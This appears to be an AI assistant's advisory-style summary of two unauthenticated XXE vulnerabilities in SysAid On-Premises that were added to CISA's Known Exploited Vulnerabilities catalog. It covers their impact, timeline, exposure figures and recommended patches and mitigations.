Overview of SysAid Vulnerabilities Added to CISA KEV (CVE-2025-2775, CVE-2025-2776)

The user's summary accurately captures the core details of these critical vulnerabilities in SysAid On-Premises, an IT service management (ITSM) software used for help desk, ticketing, and asset management. Both flaws involve unauthenticated XML External Entity (XXE) injection, enabling attackers to perform server-side request forgery (SSRF), read arbitrary files, take over administrator accounts, and potentially achieve remote code execution (RCE). They were added to CISA's Known Exploited Vulnerabilities (KEV) catalog on July 22, 2025, based on evidence of active in-the-wild exploitation. While specific attack details (e.g., actors or campaigns) remain undisclosed, these vulnerabilities pose significant risks to organizations relying on on-premises SysAid deployments, potentially leading to data breaches or system compromise.Key facts from reports:

• Vulnerability Details:
  • CVE-2025-2775 affects the "Checkin processing functionality," allowing XXE to facilitate admin account takeover and local file reads (e.g., sensitive configs or credentials).
  • CVE-2025-2776 targets the "Server URL processing functionality," with similar XXE impacts, enabling SSRF for internal network pivoting or external data exfiltration.
  • Both are pre-authentication, rated critical (CVSS scores pending full NIST analysis, but estimated high due to unauth RCE potential). A related CVE-2025-2777 (XXE in another endpoint) is often mentioned in chains but not added to KEV.
• Discovery and Timeline: Discovered by watchTowr Labs, publicly disclosed on May 7, 2025. Patches were released in SysAid version 24.4.60 (March 2025 update). Exploitation evidence prompted CISA's KEV addition on July 22, 2025—federal agencies must remediate by August 12, 2025 (per BOD 22-01).
• Impact and Exploitation: Over 6,300 internet-exposed SysAid instances are potentially vulnerable, primarily in sectors like healthcare, education, and government. Attacks could lead to ransomware deployment (echoing a 2023 SysAid zero-day exploited by Cl0p) or espionage. No public indicators of compromise (IOCs) are available yet, but proof-of-concept (PoC) exploits exist for chaining these with CVE-2025-2777 for full RCE.
• Response and Mitigations: SysAid urges immediate upgrades to version 24.4.60 b16 or later. CISA recommends applying patches, monitoring for anomalies (e.g., unusual XML requests), and isolating exposed systems. If patching isn't feasible, disable vulnerable endpoints or use web application firewalls (WAFs) to block XXE patterns. Security firms like SonicWall and Arctic Wolf have issued alerts with detection rules.

This incident underscores the dangers of unpatched on-premises ITSM tools, especially given SysAid's history of zero-day exploits. For PoC code or detailed technical analysis, check watchTowr Labs' resources. If you need help with detection scripts, patch verification, or further investigation into related threats, provide more details!